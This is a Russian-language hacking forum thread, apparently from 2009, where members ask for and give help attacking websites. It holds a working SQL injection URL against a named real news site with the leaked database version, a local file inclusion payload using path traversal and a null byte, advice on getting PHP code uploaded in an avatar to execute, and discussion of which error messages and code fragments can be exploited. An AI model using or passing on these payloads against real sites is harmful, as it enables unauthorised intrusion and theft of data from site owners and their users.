Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    175
    Likes Received:
    78
    Reputations:
    6
    Code:
    http://vb.by/author.php?topic=11&author=9+union+select+version%28%29+limit+1,1--+
     
  2. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    482
    Likes Received:
    190
    Reputations:
    221
    Так я искал, но такой запрос вызывает ошибку! Сорри я прост немного ещё в жтом не разьераюсь... учусь... Если есть возможность напиши плиз в аську 553226859
     
  3. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    476
    Likes Received:
    310
    Reputations:
    163
    Вывод в тайтл :)

    Code:
    <title>Вечерний Брест: Авторы: 5.0.51a-log</title>
     
  4. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    482
    Likes Received:
    190
    Reputations:
    221
    оу, ёмаё, не видел, спс)) но в аську всё равно плз
     
  5. Matnya

    Matnya Banned

    Joined:
    2 Dec 2009
    Messages:
    22
    Likes Received:
    1
    Reputations:
    -15
    Подскажите плиз. Блэксан нашол багу в моде булки ВБСЕО. Я пихнул в авку пых-код. пытался проинклудить но нифига. подскажите в чём дело? как проинлудить? плиз.
     
  6. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    297
    Likes Received:
    33
    Reputations:
    18
    ну тут постим может кто посоветует:
    ну если на include.php
    содержание:
    PHP:
    <?php  function __autoload($classname) {
          if(
    substr($classname,0,2) == "Ic") {
              
    $filename "classes/" $classname ".php";
              require 
    $filename;
          }  
    }    
    ?>
    тут можно ли провести инклуд?
     
  7. Scipio

    Scipio Members of Antichat

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    На Win вполне:
    ?inc=Ic/../filo.txt%00
    как то так
     
    _________________________
  8. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,594
    Likes Received:
    976
    Reputations:
    783
    На никсовых тоже сработает. Я если честно то забыл причину:( Что то в конфигах. Зависит не от оси.
     
    1 person likes this.
  9. Scipio

    Scipio Members of Antichat

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    угу, попробовал, и там и там работает, хотя я тоже помню какие то затыки были (другими словами не во всех случаях работает)
     
    _________________________
  10. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    297
    Likes Received:
    33
    Reputations:
    18
    честно я хромаю в инклуде.

    перед
    PHP:
    ?inc=Ic/../filo.txt%00
    надо найти бажный скрипт или просто
    PHP:
    include.php?inc=Ic/../filo.txt%00
     
  11. Totgeliebt

    Totgeliebt New Member

    Joined:
    20 Oct 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    Люди добрые, обьясните кто знает, что это за ошибка?SQL иньекция?
    Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'apache'@'localhost' (using password: NO) in /home/gamer/public_html/viewpage.php(26) : eval()'d code on line 6

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gamer/public_html/viewpage.php(26) : eval()'d code on line 30


    Warning: mysql_close(): supplied argument is not a valid MySQL-Link resource in /home/gamer/public_html/viewpage.php(26) : eval()'d code on line 59
     
  12. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    344
    Likes Received:
    142
    Reputations:
    81
    о том что скрипт неможет соединиться с базой данных и неправильное использование функции eval()
     
  13. Totgeliebt

    Totgeliebt New Member

    Joined:
    20 Oct 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    спс!а из этого можно что-нибудь полезное сделать?
     
  14. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    344
    Likes Received:
    142
    Reputations:
    81
    может быть можно выполнить пхп а может там еще что то есть на сайте, без линки гадать бессмысленно
     
  15. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    297
    Likes Received:
    33
    Reputations:
    18
    вот просканировал с php bug scanner от Raz0r скрипт LcApi.php:

    PHP:
        private function putCurl($url,$file) {
              
    $ch curl_init();
              
    curl_setopt($chCURLOPT_URL$url);
              
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
              
    curl_setopt($chCURLOPT_PUT1);
              
    $fh fopen($file,"r");
              
    curl_setopt($chCURLOPT_INFILE$fh);
              
    curl_setopt($chCURLOPT_INFILESIZEfilesize($file));
                        
    $result curl_exec($ch);
              if (
    curl_errno($ch)) {
                  
    $result curl_error($ch);
              }
              
    curl_close($ch);
              if(
    $this->debug) {
                  echo 
    "PUT '$url'\n";
                  echo 
    file_get_contents($file);
                  echo 
    "RESPONSE\n'$result'\n";
              } 
             return 
    $result;
          }
      
    тут на
    и
    указывает
    может посоветуете как провести инклуд
     
    #10635 YuNi|[c, 13 Dec 2009
    Last edited: 13 Dec 2009
  16. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    630
    Likes Received:
    485
    Reputations:
    176
    ну тут есть функция, в параметрах которой передаётся $file. с лишь этим ничего не сделаешь. вот найдешь где эта функция вызывается, тогда поговорим дальше. возможность тут есть, если вызовется функция и в параметрах предастся значение которое мы в состоянии изменять под наши нужды.
     
  17. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    297
    Likes Received:
    33
    Reputations:
    18
    тоесть надо найти где на каком скрипте вызывается функция $file?

    вот еще допольнительно:
    PHP:
    private function doPut($path,$file) {
                
    $putdata file_get_contents($file);
     
    #10637 YuNi|[c, 13 Dec 2009
    Last edited: 13 Dec 2009
  18. Totgeliebt

    Totgeliebt New Member

    Joined:
    20 Oct 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    Прошу ответить кого-нибудь
     
  19. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    501
    Likes Received:
    380
    Reputations:
    49
    нет коннекта к БД
     
  20. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    297
    Likes Received:
    33
    Reputations:
    18
    да похож на sql инъекци на mysql но может коннект
     
Loading...
Thread Status:
Not open for further replies.